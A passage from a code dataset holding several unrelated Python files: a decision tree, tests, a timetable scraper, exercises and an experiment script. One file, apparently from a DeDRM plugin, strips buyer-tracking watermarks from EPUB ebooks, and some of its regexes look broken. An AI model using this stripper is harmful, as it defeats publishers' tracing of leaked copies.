min(gini_list)\n\t\tindex_min = gini_list.index(min_gini)\n\t\tcol_split[col] = [point_split[index_min], min_gini]\n\n\tmin_split_col = min(col_split.items(), key=lambda x: x[1][1])\n\treturn min_split_col[0], min_split_col[1][0], min_split_col[1][1]\n\n# CART algorithm\ndef cart_tree(data, labels='labels'):\n\t# If all samples belong to one class, stop\n\tif data.groupby(labels).size()[0] == len(data):\n\t\treturn data[labels].values[0]\n\t# 
If only one column remains, stop:\n\tif len(data.columns) == 1:\n\t\treturn data.groupby(labels).size().sort_values().index[-1]\n\n\t# Pick the feature and split point with the smallest Gini index\n\ttree_labels = data.columns.values\n\tbest_split_col, best_split_point, best_split_gini = gini_col(data)\n\tif best_split_gini < 0.001:\n\t\treturn data.groupby(labels).size().sort_values().index[-1]\n\n\tif len(data.iloc[:, best_split_col]) == 1:\n\t\treturn data[labels].values[0]\n\n\tbest_tree_labels = tree_labels[best_split_col]\n\tkey = best_tree_labels + ':' + str(best_split_point)\n\tdecision_tree = {key: {}}\n\n\tdata_left = data[data[best_tree_labels] <= best_split_point]\n\tdecision_tree[key][0] = cart_tree(data_left, labels='labels')\n\tdata_right = data[data[best_tree_labels] > best_split_point]\n\tdecision_tree[key][1] = cart_tree(data_right, labels='labels')\n\n\t\n\n\treturn decision_tree\n\n\n# Pick the feature with the best split criterion\ndef choose_best_feature(data, method='ID3'):\n\tm, n = data.shape\n\t\n\tif method == 'ID3':\n\t\t# ID3: maximal information gain == minimal conditional entropy\n\t\tentropy_split = [entropy_condition(data, n_split) for n_split in range(n-1)]\n\t\treturn entropy_split.index(min(entropy_split))\n\telif method == 'C4.5':\n\t\t# C4.5: pick the feature with the largest gain ratio (gain / split info)\n\t\tH_D = emp_entropy(data)\n\t\tgain_ratio = []\n\t\tfor n_split in range(n-1):\n\t\t\tsplit_info = np.sum(entropy(item, m) for item in data.groupby(data.iloc[:, n_split]).size().values)\n\t\t\tgain = H_D - entropy_condition(data, n_split)\n\t\t\tgain_ratio.append(gain / split_info if split_info else 0.0)\n\t\treturn gain_ratio.index(max(gain_ratio))\n\n# ID3/C4.5 algorithm\ndef create_tree(data, labels='labels', method='ID3'): \n\n\t# If all samples belong to one class, stop\n\tif data.groupby(labels).size()[0] == len(data):\n\t\treturn data[labels].values[0]\n\t# If only one column remains, stop:\n\tif len(data.columns) == 1:\n\t\treturn data.groupby(labels).size().sort_values().index[-1]\n\n\t# Pick the feature with the largest information gain\n\ttree_labels = data.columns.values\n\tbest_split = choose_best_feature(data, method)\n\tbest_tree_labels = tree_labels[best_split]\n\tdecision_tree = {best_tree_labels: {}}\n\tfeatures = set(data[best_tree_labels])\n\t\n\n\tfor item in features:\n\t\tsub_data = data[data[best_tree_labels]==item]\n\t\t\n\t\tsub_data.drop([best_tree_labels], axis=1, inplace=True)\n\t\tdecision_tree[best_tree_labels][item] = create_tree(sub_data, labels=labels, method=method)\n\n\treturn decision_tree\n\n\t\n\n\nif __name__ == '__main__':\n\tdata = pd.read_csv('iris.data', header=None)\n\tdata.columns = ['Sepal.Length', 'Sepal.Width', 'Petal.Length', 'Petal.Width', 'labels']\n\tclass_names = ['Iris Setosa', 'Iris Versicolour', 'Iris Virginica']\n\t# H_D = emp_entropy(data)\n\ttest = entropy_condition(data, 1)\n\t\n\t# print(create_tree(data, method='C4.5'))\n\tprint(cart_tree(data))\n\n","sub_path":"DecisionTree_classfy.py","file_name":"DecisionTree_classfy.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"47290400","text":"from business_rules.actions import BaseActions, rule_action\nfrom business_rules.fields import FIELD_TEXT\nfrom business_rules.variables import BaseVariables, boolean_rule_variable\nfrom business_rules.engine import run_all_with_results\nfrom . 
import TestCase\n\n\nclass ActionsResultsClassTests(TestCase):\n \"\"\" Test methods on getting fired rules actions results\n \"\"\"\n def test_get_actions_results(self):\n class SomeVariables(BaseVariables):\n @boolean_rule_variable\n def this_is_rule_1(self):\n return True\n\n @boolean_rule_variable\n def this_is_rule_2(self):\n return False\n\n class SomeActions(BaseActions):\n\n @rule_action(params={'foo':FIELD_TEXT})\n def some_action_1(self, foo):\n return foo\n\n @rule_action(params={'foobar':FIELD_TEXT})\n def some_action_2(self, foobar):\n return foobar\n\n @rule_action()\n def some_action_3(self):\n pass\n \n rule1 = {'conditions': {'all': [\n {\n 'name': 'this_is_rule_1',\n 'value': True,\n 'operator': 'is_true'\n }]},\n 'actions': [\n {'name': 'some_action_1',\n 'params': {'foo': 'fooValue'}\n }]}\n rule2 = {'conditions': {'all': [\n {\n 'name': 'this_is_rule_2',\n 'value': True,\n 'operator': 'is_false'\n }]},\n 'actions': [\n {'name': 'some_action_2',\n 'params': {'foobar': 'foobarValue'}\n },\n {'name': 'some_action_3'\n }]}\n\n variables = SomeVariables()\n actions = SomeActions()\n result = run_all_with_results([rule1, rule2], variables, actions)\n self.assertEqual(result, [{'some_action_1': 'fooValue'}, {'some_action_2': 'foobarValue'}])\n","sub_path":"tests/test_get_actions_results.py","file_name":"test_get_actions_results.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"19540269","text":"import requests\nimport argparse\nfrom lxml import html\n\n\ndef get_me_stuf(page):\n tree = html.fromstring(page.text)\n dates = tree.xpath(\"//table[@class='results']/tbody/tr[1]/td[2]/text()\")\n departures = tree.xpath(\"//table[@class='results']/tbody/tr[1]/td[5]/text()\")\n stations = tree.xpath(\"//table[@class='results']/tbody/tr[1]/td[3]/text()\")\n vehicles = tree.xpath(\"//table[@class='results']/tbody/tr[1]/td[7]/img[1]/@title\")\n\n end_station = tree.xpath(\"//table[@class='results']/tbody/tr[position() = (last()-1)]/td[3]/text()\")\n arrivals = tree.xpath(\"//table[@class='results']/tbody/tr[position() = (last()-1)]/td[4]/text()\")\n\n #arrivals = tree.xpath(\"//table[@class='results']/tbody/tr/td[starts-with(@class, 'suppress']/text()\")\n #departures = tree.xpath(\"//table[@class='results']/tbody/tr/td[starts-with(@class, 'suppress']/following-sibling/text()\")\n return dates, departures, stations, vehicles, arrivals, end_station\n\n\n\nparser = argparse.ArgumentParser(description='Description of your program')\nparser.add_argument('-f','--dfrom', help='Destination from', required=True)\nparser.add_argument('-t','--dto', help='Destination to', required=True)\nargs = parser.parse_args()\n\nd_from = args.dfrom\nd_to = args.dto\n\n\nsession = requests.Session()\n\ntokenRequest = session.get('https://cp.hnonline.sk/vlakbusmhd/spojenie/')\ntree = html.fromstring(tokenRequest.text)\n#headers = tokenRequest.headers\n\nelements = tree.xpath(\"//*[starts-with(@id, '__')]/@id\")\nvals = tree.xpath(\"//*[starts-with(@id, '__')]/@value\")\ndictionary = dict(zip(elements, vals))\n\n\nsome_stuff = {'ctl00$cDM$cF$0t': d_from,\n 'ctl00$cDM$cF$0h': d_from,\n 'ctl00$cDM$cT$0t': d_to,\n 'ctl00$cDM$cT$0h': d_to,\n 'IsDepTime': 'true',\n 'ctl00$cDM$cSB$cmdSearch': \"Hľadať\"}\n\npayload = {**some_stuff, ** dictionary}\n\nres = session.post('https://cp.hnonline.sk/vlakbusmhd/spojenie/', 
data=payload)\n\n\nprint(get_me_stuf(res))\n\n\n#print(res.text)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"52203958","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# epubwatermark.py\n# Copyright © 2021 NoDRM\n\n# Revision history:\n# 1.0 - Initial version\n\n# Released under the terms of the GNU General Public Licence, version 3\n# \n\n\"\"\"\nRemoves various watermarks from EPUB files\n\"\"\"\n\nimport traceback\nfrom zipfile import ZipInfo, ZipFile, ZIP_STORED, ZIP_DEFLATED\nfrom zeroedzipinfo import ZeroedZipInfo\nfrom contextlib import closing\nfrom lxml import etree\nimport re\n\n# Runs a RegEx over all HTML/XHTML files to remove watermakrs.\ndef removeHTMLwatermarks(object, path_to_ebook):\n try: \n inf = ZipFile(open(path_to_ebook, 'rb'))\n namelist = inf.namelist()\n\n modded_names = []\n modded_contents = []\n\n count_adept = 0\n count_pocketbook = 0\n count_lemonink_invisible = 0\n count_lemonink_visible = 0\n lemonink_trackingID = None\n\n for file in namelist:\n if not (file.endswith('.html') or file.endswith('.xhtml') or file.endswith('.xml')):\n continue\n\n try:\n file_str = inf.read(file).decode(\"utf-8\")\n str_new = file_str\n\n # Remove Adobe ADEPT watermarks\n # Match optional newline at the beginning, then a \"meta\" tag with name = \"Adept.expected.resource\" or \"Adept.resource\"\n # and either a \"value\" or a \"content\" element with an Adobe UUID\n pre_remove = str_new\n str_new = re.sub(r'((\\r\\n|\\r|\\n)\\s*)?\\', '', str_new)\n str_new = re.sub(r'((\\r\\n|\\r|\\n)\\s*)?\\', '', str_new)\n\n if (str_new != pre_remove):\n count_adept += 1\n\n # Remove Pocketbook watermarks\n pre_remove = str_new\n str_new = re.sub(r'\\
(.*?)\\<\\/div\\>', '', str_new)\n\n if (str_new != pre_remove):\n count_pocketbook += 1\n\n\n # Remove eLibri / LemonInk watermark\n # Run this in a loop, as it is possible a file has been watermarked twice ...\n while True: \n pre_remove = str_new\n unique_id = re.search(r'<body[^>]+class=\"[^\"]*(t0x[0-9a-fA-F]{25})[^\"]*\"[^>]*>', str_new)\n if (unique_id):\n lemonink_trackingID = unique_id.groups()[0]\n count_lemonink_invisible += 1\n str_new = re.sub(lemonink_trackingID, '', str_new)\n pre_remove = str_new\n pm = r'(<body[^>]+class=\"[^\"]*\"[^>]*>)'\n pm += r'\\
(.*?)
'\n pm += r'\\
(.*?)
'\n str_new = re.sub(pm, r'\\1', str_new)\n\n if (str_new != pre_remove):\n count_lemonink_visible += 1\n else: \n break\n\n except:\n traceback.print_exc()\n continue\n\n if (file_str == str_new):\n continue\n\n modded_names.append(file)\n modded_contents.append(str_new)\n\n \n if len(modded_names) == 0:\n # No file modified, return original\n return path_to_ebook\n\n if len(modded_names) != len(modded_contents):\n # Something went terribly wrong, return original\n print(\"Watermark: Error during watermark removal\")\n return path_to_ebook\n\n # Re-package with modified files:\n namelist.remove(\"mimetype\")\n\n try: \n output = object.temporary_file(\".epub\").name\n kwds = dict(compression=ZIP_DEFLATED, allowZip64=False)\n with closing(ZipFile(open(output, 'wb'), 'w', **kwds)) as outf:\n for path in ([\"mimetype\"] + namelist):\n\n data = inf.read(path)\n \n try: \n modded_index = None\n modded_index = modded_names.index(path)\n except:\n pass\n\n if modded_index is not None:\n # Found modified file - replace contents\n data = modded_contents[modded_index]\n\n zi = ZipInfo(path)\n oldzi = inf.getinfo(path)\n try: \n zi.compress_type = oldzi.compress_type\n if path == \"mimetype\":\n zi.compress_type = ZIP_STORED\n zi.date_time = oldzi.date_time\n zi.comment = oldzi.comment\n zi.extra = oldzi.extra\n zi.internal_attr = oldzi.internal_attr\n zi.external_attr = oldzi.external_attr\n zi.volume = oldzi.volume\n zi.create_system = oldzi.create_system\n zi.create_version = oldzi.create_version\n\n if any(ord(c) >= 128 for c in path) or any(ord(c) >= 128 for c in zi.comment):\n # If the file name or the comment contains any non-ASCII char, set the UTF8-flag\n zi.flag_bits |= 0x800\n except:\n pass\n\n # Python 3 has a bug where the external_attr is reset to `0o600 << 16`\n # if it's NULL, so we need a workaround:\n if zi.external_attr == 0: \n zi = ZeroedZipInfo(zi)\n\n\n outf.writestr(zi, data)\n except:\n traceback.print_exc()\n return path_to_ebook\n\n if (count_adept > 0):\n print(\"Watermark: Successfully stripped {0} ADEPT watermark(s) from ebook.\".format(count_adept))\n \n if (count_lemonink_invisible > 0 or count_lemonink_visible > 0):\n print(\"Watermark: Successfully stripped {0} visible and {1} invisible LemonInk watermark(s) (\\\"{2}\\\") from ebook.\"\n .format(count_lemonink_visible, count_lemonink_invisible, lemonink_trackingID))\n \n if (count_pocketbook > 0):\n print(\"Watermark: Successfully stripped {0} Pocketbook watermark(s) from ebook.\".format(count_pocketbook))\n\n return output\n\n except:\n traceback.print_exc()\n return path_to_ebook\n \n\n\n\n# Finds the main OPF file, then uses RegEx to remove watermarks\ndef removeOPFwatermarks(object, path_to_ebook):\n contNS = lambda tag: '{%s}%s' % ('urn:oasis:names:tc:opendocument:xmlns:container', tag)\n opf_path = None\n\n try:\n inf = ZipFile(open(path_to_ebook, 'rb'))\n container = etree.fromstring(inf.read(\"META-INF/container.xml\"))\n rootfiles = container.find(contNS(\"rootfiles\")).findall(contNS(\"rootfile\"))\n for rootfile in rootfiles: \n opf_path = rootfile.get(\"full-path\", None)\n if (opf_path is not None):\n break\n except: \n traceback.print_exc()\n return path_to_ebook\n\n # If path is None, we didn't find an OPF, so we probably don't have a font key.\n # If path is set, it's the path to the main content OPF file.\n\n if (opf_path is None):\n # No OPF found - no watermark\n return path_to_ebook\n else:\n try:\n container_str = inf.read(opf_path).decode(\"utf-8\")\n container_str_new = container_str\n\n 
had_amazon = False\n had_elibri = False\n\n # Remove Amazon hex watermarks\n # Match optional newline at the beginning, then spaces, then a \"meta\" tag with name = \"Watermark\" or \"Watermark_(hex)\" and a \"content\" element.\n # This regex also matches DuMont watermarks with meta name=\"watermark\", with the case-insensitive match on the \"w\" in watermark.\n pre_remove = container_str_new\n container_str_new = re.sub(r'((\\r\\n|\\r|\\n)\\s*)?\\', '', container_str_new)\n container_str_new = re.sub(r'((\\r\\n|\\r|\\n)\\s*)?\\', '', container_str_new)\n if pre_remove != container_str_new:\n had_amazon = True\n\n # Remove elibri / lemonink watermark\n # Lemonink replaces all \"id\" fields in the opf with \"idX_Y\", with X being the watermark and Y being a number for that particular ID.\n # This regex replaces all \"idX_Y\" IDs with \"id_Y\", removing the watermark IDs.\n pre_remove = container_str_new\n container_str_new = re.sub(r'((\\r\\n|\\r|\\n)\\s*)?\\<\\!\\-\\-\\s*Wygenerowane przez elibri dla zamówienia numer [0-9a-fA-F]+\\s*\\-\\-\\>', '', container_str_new)\n if pre_remove != container_str_new:\n # To prevent this Regex from applying to books without that watermark, only do that if the watermark above was found.\n container_str_new = re.sub(r'\\=\\\"id[0-9]+_([0-9]+)\\\"', r'=\"id_\\1\"', container_str_new)\n if pre_remove != container_str_new:\n had_elibri = True\n\n except:\n traceback.print_exc()\n return path_to_ebook\n\n if (container_str == container_str_new):\n # container didn't change - no watermark\n return path_to_ebook\n\n # Re-package without watermark\n namelist = inf.namelist()\n namelist.remove(\"mimetype\")\n\n try: \n output = object.temporary_file(\".epub\").name\n kwds = dict(compression=ZIP_DEFLATED, allowZip64=False)\n with closing(ZipFile(open(output, 'wb'), 'w', **kwds)) as outf:\n for path in ([\"mimetype\"] + namelist):\n\n data = inf.read(path)\n if path == opf_path:\n # Found OPF, replacing ...\n data = container_str_new\n\n zi = ZipInfo(path)\n oldzi = inf.getinfo(path)\n try: \n zi.compress_type = oldzi.compress_type\n if path == \"mimetype\":\n zi.compress_type = ZIP_STORED\n zi.date_time = oldzi.date_time\n zi.comment = oldzi.comment\n zi.extra = oldzi.extra\n zi.internal_attr = oldzi.internal_attr\n zi.external_attr = oldzi.external_attr\n zi.volume = oldzi.volume\n zi.create_system = oldzi.create_system\n zi.create_version = oldzi.create_version\n\n if any(ord(c) >= 128 for c in path) or any(ord(c) >= 128 for c in zi.comment):\n # If the file name or the comment contains any non-ASCII char, set the UTF8-flag\n zi.flag_bits |= 0x800\n except:\n pass\n\n # Python 3 has a bug where the external_attr is reset to `0o600 << 16`\n # if it's NULL, so we need a workaround:\n if zi.external_attr == 0: \n zi = ZeroedZipInfo(zi)\n\n outf.writestr(zi, data)\n except:\n traceback.print_exc()\n return path_to_ebook\n \n if had_elibri:\n print(\"Watermark: Successfully stripped eLibri watermark from OPF file.\")\n if had_amazon:\n print(\"Watermark: Successfully stripped Amazon watermark from OPF file.\")\n\n return output\n\n\n\ndef removeCDPwatermark(object, path_to_ebook):\n # \"META-INF/cdp.info\" is a watermark file used by some Tolino vendors. 
\n # We don't want that in our eBooks, so lets remove that file.\n try: \n infile = ZipFile(open(path_to_ebook, 'rb'))\n namelist = infile.namelist()\n if 'META-INF/cdp.info' not in namelist:\n return path_to_ebook\n\n namelist.remove(\"mimetype\")\n namelist.remove(\"META-INF/cdp.info\")\n\n output = object.temporary_file(\".epub\").name\n\n kwds = dict(compression=ZIP_DEFLATED, allowZip64=False)\n with closing(ZipFile(open(output, 'wb'), 'w', **kwds)) as outf:\n for path in ([\"mimetype\"] + namelist):\n\n data = infile.read(path)\n \n zi = ZipInfo(path)\n oldzi = infile.getinfo(path)\n try: \n zi.compress_type = oldzi.compress_type\n if path == \"mimetype\":\n zi.compress_type = ZIP_STORED\n zi.date_time = oldzi.date_time\n zi.comment = oldzi.comment\n zi.extra = oldzi.extra\n zi.internal_attr = oldzi.internal_attr\n zi.external_attr = oldzi.external_attr\n zi.volume = oldzi.volume\n zi.create_system = oldzi.create_system\n zi.create_version = oldzi.create_version\n\n if any(ord(c) >= 128 for c in path) or any(ord(c) >= 128 for c in zi.comment):\n # If the file name or the comment contains any non-ASCII char, set the UTF8-flag\n zi.flag_bits |= 0x800\n except:\n pass\n\n # Python 3 has a bug where the external_attr is reset to `0o600 << 16`\n # if it's NULL, so we need a workaround:\n if zi.external_attr == 0: \n zi = ZeroedZipInfo(zi)\n\n outf.writestr(zi, data)\n \n print(\"Watermark: Successfully removed cdp.info watermark\")\n return output\n\n except: \n traceback.print_exc()\n return path_to_ebook","sub_path":"DeDRM_plugin/epubwatermark.py","file_name":"epubwatermark.py","file_ext":"py","file_size_in_byte":14559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"167598751","text":"'''\nHacker Pals\nPython Turtles Tutorial\nhttp://hackerpals.com\n'''\n\nimport turtle\n\nleo = turtle.Turtle() # Create Leo\n\n# Loop 4 times. Everything I want to repeat is\n# *indented* by four spaces.\nfor i in range(4):\n leo.forward(50)\n leo.right(90)\n\n# This isn't indented, so we aren't repeating it.\nturtle.done()\n","sub_path":"ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"519215975","text":"\ndef work(a):\n #а-я, о-е, у-ю, ы-и, э-е\n glasnie = ['а','я','о','e','у','ю','ы','и','э','e']\n answer = ''\n \n for i in a:\n if(i not in glasnie):\n answer+=i\n print(answer)\n\ndef is_right(a):\n try:\n a = str(a)\n except ValueError:\n return False\n return a\n \ndef main():\n while True:\n a = input('Введите слово ')\n a = is_right(a)\n if(a is False): \n print('Введите корректное слово ')\n continue\n work(a)\n asnwer = input(\"Продолжить? 
(да/нет) \")\n if(asnwer == 'нет'):\n break\n \nmain()","sub_path":"10/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"65470076","text":"# class Solution(object):\n# def minWindow(self, s, t):\n# \"\"\"\n# :type s: str\n# :type t: str\n# :rtype: str\n# \"\"\"\n# if len(s) < len(t):\n# return \"\"\n#\n# d = dict()\n# for i in range(len(t)):\n# d[t[i]] = d.get(t[i], 0) + 1\n#\n# slow = 0\n# minLen = float(\"inf\")\n# matchCount = 0\n# index = 0\n#\n# for i in range(len(s)):\n# if s[i] in d:\n# d[s[i]] -= 1\n# ####from 1 to 0\n# if d[s[i]] == 0:\n# matchCount += 1\n#\n# while matchCount == len(d.keys()):\n# ####find a valid substring\n# if i - slow + 1 < minLen:\n# minLen = i - slow + 1\n# index = slow\n# leftmost = s[slow]\n# slow += 1\n# if leftmost not in d:\n# continue\n# else:\n# ####from 0 to 1\n# d[leftmost] += 1\n# if d[leftmost] > 0:\n# matchCount -= 1\n#\n# return \"\" if minLen == float(\"inf\") else s[index : index + minLen]\n#\n#\nimport collections\n\n#\n#\n# class Solution:\n# def minWindow(self, s: str, t: str) -> str:\n# res = \"\"\n# left, cnt, minLen = 0, 0, float(\"inf\")\n# count = collections.Counter(t)\n# for i, c in enumerate(s):\n# print(f\"left = {left}, cnt={cnt}, minLen={minLen}, count={count}\")\n# count[c] -= 1\n# if count[c] >= 0:\n# cnt += 1\n# while cnt == len(t):\n# if minLen > i - left + 1:\n# minLen = i - left + 1\n# res = s[left : i + 1]\n# count[s[left]] += 1\n# if count[s[left]] > 0:\n# cnt -= 1\n# left += 1\n# return res\n\nimport pysnooper\n\n\nclass Solution:\n @pysnooper.snoop()\n def minWindow(self, s: str, t: str) -> str:\n res = \"\"\n cur = float(\"inf\")\n\n start = 0\n debt = len(t)\n d = collections.Counter(t)\n for i, c in enumerate(s):\n d[c] -= 1\n if d[c] >= 0:\n debt -= 1\n while debt == 0:\n if cur > i - start + 1:\n cur = i - start + 1\n res = s[start : i + 1]\n d[s[start]] += 1\n if d[s[start]] > 0:\n debt += 1\n start += 1\n return res\n\n\nif __name__ == \"__main__\":\n S = \"ADOBECODEBANC\"\n T = \"ABC\"\n result = Solution().minWindow(S, T)\n print(result)\n","sub_path":"Leetcode/0076-Minimum-Window-Substring.py","file_name":"0076-Minimum-Window-Substring.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"382677520","text":"import os\nimport time\nimport numpy as np\nfrom Experiments import CNNExperiment\n\nnp.set_printoptions(precision=4, suppress=True)\n\n# some arbitrary targets\ntarget_neurons = (('caffenet', 'fc8', 1), ('caffenet', 'fc8', 407), ('caffenet', 'fc8', 632),\n # ('placesCNN', 'fc8', 55), ('placesCNN', 'fc8', 74), ('placesCNN', 'fc8', 162),\n # ('googlenet', 'loss3/classifier', 1), ('googlenet', 'loss3/classifier', 407),\n # ('googlenet', 'loss3/classifier', 632),\n # ('resnet-152', 'fc1000', 1), ('resnet-152', 'fc1000', 407), ('resnet-152', 'fc1000', 632),\n )\n\noptimizer_name = 'genetic'\ntarget_params = ['population_size', 'mutation_rate', 'mutation_size', 'selectivity', 'heritability', 'n_conserve']\n# optimizer_name = 'FDGD'\n# target_params = ['n_samples', 'search_radius', 'learning_rate', 'antithetic']\ninit_codes_dir = None\nstoch = False\nif stoch:\n target_params += ['reps']\ngenerator_name = 'deepsim-fc6'\nserial_number = 1\nmax_images = 10000\nsearch_steps = (5, 3,)\nadvance_in_cycle = False\n\n# param_vals_options is accessed as tuple = 
param_vals_options[optimizer_name][generator_name][stoch]\n# tuple[0] is tuple containing current best values, in the same order as target_params\n# tuple[1] is tuple containing either\n# one tuple of tuples per target_param (in the same order)\n# - tuple_[0]: value step sizes, in decreasing order\n# - tuple_[1]: value bounds (lbound, ubound), inclusive\n# - tuple_[2]: value dtype\n# or value options\nparam_vals_options = ( # Genetic\n (20, 0.5, 0.5, 2, 0.5, 0, None,),\n (((15, 10, 5, 2), (2, 100), int), # population_size\n ((0.2, 0.1, 0.05), (0, 1), float), # mutation_rate\n ((0.5, 0.25, 0.1, 0.05), (0, 20), float), # mutation_size\n ((1, 0.5, 0.25), (0.1, 5), float), # selectivity\n ((0.25, 0.1), (0.5, 1), float), # heritability\n ((1,), (0, 10), int)), # n_conserve\n)\n# param_vals_options = ( # FDGD\n# (20, 1.5, 1.5, True),\n# (((20, 10, 5, 2, 1), (2, 100), int), # n_samples\n# ((0.5, 0.25, 0.1), (0.01, 10), float), # search_radius\n# ((0.5, 0.25, 0.1), (0.01, 20), float), # learning_rate\n# (True, False)), # antithetic\n# )\n\njobsuperdir = 'param_opt' # to be changed by user\njobname = '%s-%s-%s%d' % (optimizer_name, generator_name, ('det', 'stoch')[stoch], serial_number)\njobrootdir = os.path.join(jobsuperdir, jobname)\nlogfn = '%s.txt' % jobname\nlogfpath = os.path.join(jobsuperdir, logfn)\nif os.path.isfile(logfpath):\n raise IOError('log file %s exists!' % logfpath)\n\n\ndef flush_logtext_to_file(logtext):\n with open(logfpath, 'a') as f:\n f.write(logtext)\n return ''\n\n\n# current best settings and param val options\nbest_exp_settings = {\n 'optimizer_name': optimizer_name,\n 'optimizer_parameters': {\n 'generator_name': generator_name,\n 'initial_codes_dir': init_codes_dir,\n },\n 'with_write': False,\n 'max_images': max_images,\n 'random_seed': 0,\n 'stochastic': stoch,\n 'config_file_path': __file__,\n}\nparam_stepsize_ptr = {param: 0 for param in target_params}\nparam_searchsteps_ptr = {param: 0 for param in target_params}\nparam_steps_unchanged = {param: 0 for param in target_params}\nparam_fixed_val_options = {param: not isinstance(param_vals_options[1][iparam][0], tuple)\n for iparam, param in enumerate(target_params)}\nparam_to_index = {param: iparam for iparam, param in enumerate(target_params)}\n\n\ndef get_param_val(param, exp_settings):\n if param == 'reps':\n return exp_settings[param]\n else:\n return exp_settings['optimizer_parameters'][param]\n\n\ndef set_param_val(param, new_val, exp_settings):\n if param == 'reps':\n exp_settings[param] = new_val\n else:\n exp_settings['optimizer_parameters'][param] = new_val\n return exp_settings\n\n\ndef get_params_vals(exp_settings):\n param_vals = [None for _ in target_params]\n for param in target_params:\n param_vals[param_to_index[param]] = get_param_val(param, exp_settings)\n return param_vals\n\n\ndef get_param_val_options(param, param_curr_best):\n iparam = param_to_index[param]\n if param_fixed_val_options[param]:\n return param_vals_options[1][iparam]\n stepsize = param_vals_options[1][iparam][0][param_stepsize_ptr[param]]\n ub, lb = param_vals_options[1][iparam][1]\n dtype = param_vals_options[1][iparam][2]\n searchsteps = search_steps[param_searchsteps_ptr[param]]\n val_options = np.arange(param_curr_best-stepsize*searchsteps, param_curr_best+stepsize*searchsteps, stepsize)\n val_options = np.round(np.unique(np.clip(val_options, ub, lb)), 3).astype(dtype)\n val_options = val_options[np.argsort(np.abs(val_options-param_curr_best))][:searchsteps]\n val_options.sort()\n return val_options\n\n\ndef 
get_remaining_stepsizes():\n remaining_stepsizes = {}\n for param in target_params:\n iparam = param_to_index[param]\n if param_fixed_val_options[param]:\n remaining_stepsizes[param] = None\n else:\n remaining_stepsizes[param] = param_vals_options[1][iparam][0][param_stepsize_ptr[param]:]\n return remaining_stepsizes\n\n\nparam_val_options = {}\nparams_curr_best = {}\nfor iparam, param in enumerate(target_params):\n param_curr_best = param_vals_options[0][iparam]\n params_curr_best[param] = param_curr_best\n best_exp_settings = set_param_val(param, param_curr_best, best_exp_settings)\n param_val_options[param] = get_param_val_options(param, param_curr_best)\nbest_scores = np.ones(len(target_neurons)) # dummy initial score\nlogtext = 'Initial condition:\\n\\tbest scores (dummy initialized)\\n\\t\\t%s\\n\\texp settings\\n\\t\\t%s\\n' %\\\n (str(best_scores), str(best_exp_settings))\nlogtext += 'Target neurons:\\n\\t%s\\n' % str(target_neurons)\nlogtext += 'Target params values:\\n\\t%s\\n' % param_val_options\nlogtext += 'Target params step sizes:\\n\\t%s\\n' % str(get_remaining_stepsizes())\nlogtext = flush_logtext_to_file(logtext)\n\nfinished = False\nrecently_advanced_params = set()\ntested_params_vals_scores = {}\nt0 = time.time()\niround = -1\nwhile not finished:\n iround += 1\n # change up the order of target params\n np.random.shuffle(target_params)\n\n logtext += '\\n\\nRound %d\\nTarget param order:\\n\\t%s\\n' % (iround, target_params)\n # logtext += 'Target params values:\\n\\t%s\\n' % param_val_options\n logtext = flush_logtext_to_file(logtext)\n\n none_changed = True\n for iparam, param in enumerate(target_params):\n logtext += '\\nTesting param %s\\n' % param\n old_param_val = get_param_val(param, best_exp_settings)\n tested_param_vals = []\n scoress = [] # list of lists (one per param val option) of scores (one per target neuron)\n score_ratioss = [] # same structure as above\n mean_score_ratios = [] # list of ratios (one per param val option), averaged over target neurons\n for new_param_val in param_val_options[param]:\n if new_param_val == old_param_val and (iround > 0 or iparam > 0):\n continue\n tested_param_vals.append(new_param_val)\n to_try_params_vals = get_params_vals(best_exp_settings)\n to_try_params_vals[param_to_index[param]] = new_param_val\n to_try_params_vals = tuple(to_try_params_vals)\n try:\n scoress.append(tested_params_vals_scores[to_try_params_vals])\n logtext += '\\tvalue: %s, scores\\t[' % str(new_param_val)\n for curr_score in scoress[-1]:\n logtext += '%5.2f, ' % curr_score\n except KeyError:\n scoress.append([])\n best_exp_settings = set_param_val(param, new_param_val, best_exp_settings)\n logtext += '\\tvalue: %s, scores\\t[' % str(new_param_val)\n for target_neuron in target_neurons:\n neuron = target_neuron\n if len(neuron) == 5:\n subdir = '%s_%s_%04d_%d,%d' % \\\n (neuron[0], neuron[1].replace('/', '_'), neuron[2], neuron[3], neuron[4])\n else:\n subdir = '%s_%s_%04d' % (neuron[0], neuron[1].replace('/', '_'), neuron[2])\n i = 0\n while os.path.isdir(os.path.join(jobrootdir, subdir, str(i))):\n i += 1\n best_exp_settings['project_dir'] = os.path.join(jobrootdir, subdir, str(i))\n best_exp_settings['target_neuron'] = target_neuron\n os.makedirs(best_exp_settings['project_dir'])\n\n experiment = CNNExperiment(**best_exp_settings)\n experiment.run()\n\n curr_score = np.max(experiment.scorer.curr_scores, axis=0)\n scoress[-1].append(curr_score)\n logtext += '%5.2f, ' % curr_score\n tested_params_vals_scores[to_try_params_vals] = 
